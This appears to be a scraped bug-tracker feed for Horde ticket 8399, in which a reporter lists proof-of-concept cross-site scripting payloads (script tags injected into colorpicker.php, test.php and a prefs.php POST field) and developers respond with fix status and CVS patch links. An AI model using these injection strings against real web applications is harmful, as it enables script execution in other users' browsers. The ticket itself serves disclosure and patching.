Number preferences are not validated properly Tue, 16 Mar 2010 07:43:20 -0400 http://bugs.horde.org/ticket/8399 Number preferences are not validated properly Multiple cross site scripting vulnerabilites exist. Proof o Multiple cross site scripting vulnerabilites exist. Proof of concepts: http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script> POST to http://hordeserver.com/horde/services/prefs.php with the following content: actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on Fri, 03 Jul 2009 14:48:49 -0400 http://bugs.horde.org/ticket/8399#t54781 > Multiple cross site scripting vulnerabilites exist. Proof > Multiple cross site scripting vulnerabilites exist. Proof of concepts: Horde 3.1 has been deprecated for a long time. The current stable version is 3.3, and we backport serious security fixes to 3.2. > http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script> > https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[" This file doesn't exist in 3.2 or later. > https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script> This was fixed almost 2 years ago, before 3.2.0: http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9 > POST to http://hordeserver.com/horde/services/prefs.php with the > following content: > actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on This I can actually reproduce as a problem. Patch forthcoming. Sat, 11 Jul 2009 17:08:06 -0400 http://bugs.horde.org/ticket/8399#t54916 Changes have been made in CVS for this ticket: http://cvs.h Changes have been made in CVS for this ticket: http://cvs.horde.org/diff.php/framework/Prefs/Prefs/UI.php?rt=horde&r1=1.104&r2=1.105&ty=u http://cvs.horde.org/diff.php/horde/docs/CHANGES?rt=horde&r1=1.1239&r2=1.1240&ty=u http://cvs.horde.org/diff.php/horde/lib/prefs.php?rt=horde&r1=1.53&r2=1.54&ty=u Sat, 11 Jul 2009 19:29:14 -0400 http://bugs.horde.org/ticket/8399#t54918 Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cv Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs). Sat, 11 Jul 2009 19:40:05 -0400 http://bugs.horde.org/ticket/8399#t54919